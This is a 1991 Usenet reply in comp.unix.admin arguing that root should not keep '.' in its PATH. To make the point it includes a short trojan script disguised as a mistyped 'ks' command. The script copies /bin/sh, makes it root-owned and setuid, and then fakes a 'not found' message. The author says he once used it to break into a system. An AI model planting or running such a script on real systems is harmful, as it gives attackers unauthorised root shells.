Path: utzoo!utgpu!news-server.csri.toronto.edu!bonnie.concordia.ca!thunder.mcrcim.mcgill.edu!snorkelwacker.mit.edu!usc!zaphod.mps.ohio-state.edu!caen!spool.mu.edu!news.nd.edu!mentor.cc.purdue.edu!sage.cc.purdue.edu!asg
From: asg@sage.cc.purdue.edu (The Grand Master)
Newsgroups: comp.unix.admin
Subject: Re: Mysterious security hole
Message-ID: <13780@mentor.cc.purdue.edu>
Date: 19 Jun 91 23:31:26 GMT
References: <91161.131540SCHDAVZ@YaleVM.YCC.Yale.Edu> <70@pyuxf.UUCP> <12714@bsu-cs.bsu.edu> <1991Jun19.150625.17848@chinet.chi.il.us>
Sender: news@mentor.cc.purdue.edu
Reply-To: asg@sage.cc.purdue.edu (The Grand Master)
Organization: Purdue University
Lines: 48

In article <1991Jun19.150625.17848@chinet.chi.il.us> les@chinet.chi.il.us (Leslie Mikesell) writes:
}In article <12714@bsu-cs.bsu.edu> sam@bsu-cs.UUCP (B. Sam Blanchard) writes:
}
}>Here's a nice and fairly simple way to improve security.
}>PATH=/bin:/usr/bin:/etc
}
}Isn't this annoying overkill compared to just putting "." last in your
}path?  That will prevent accidental execution of the wrong copy of
}standard commands while still letting you test programs in your current
}directory and run normal makefiles without contortions.
}
}Les Mikesell
}  les@chinet.chi.il.us
 
I don't know about you. But most of the people I know are not perfect
typisdts ( ;-) ). It is not uncommon to accidently type ks instead of
ls ( I have seen many people do it before ). So now what happens when
someone puts a file ks in /tmp, and you do:
# cd tmp
# ks
(woops, I meant to type ls)
# ls
......
where the source for ks is something like:
cp /bin/sh .
chown root ./sh
chmod 4777 ./sh
echo  ks: not found

hmm. That could lead to problems (In fact I used it to break security
in a system once - and it worked!). 
The moral to the story?
Unless you are a perfect typist, or you are willing to read and re-read
every line you type BEFORE hitting <ENTER>, better be safe than sorry.

This message brought to you by CADIP

Citizens Against Dot In PATH

 From: Your friendly neighborhood Bruce Varney
---------
                                   ###             ##
Courtesy of Bruce Varney           ###               #
aka -> The Grand Master                               #
asg@sage.cc.purdue.edu             ###    #####       #
PUCC                               ###                #
;-)                                 #                #
;'>                                #               ##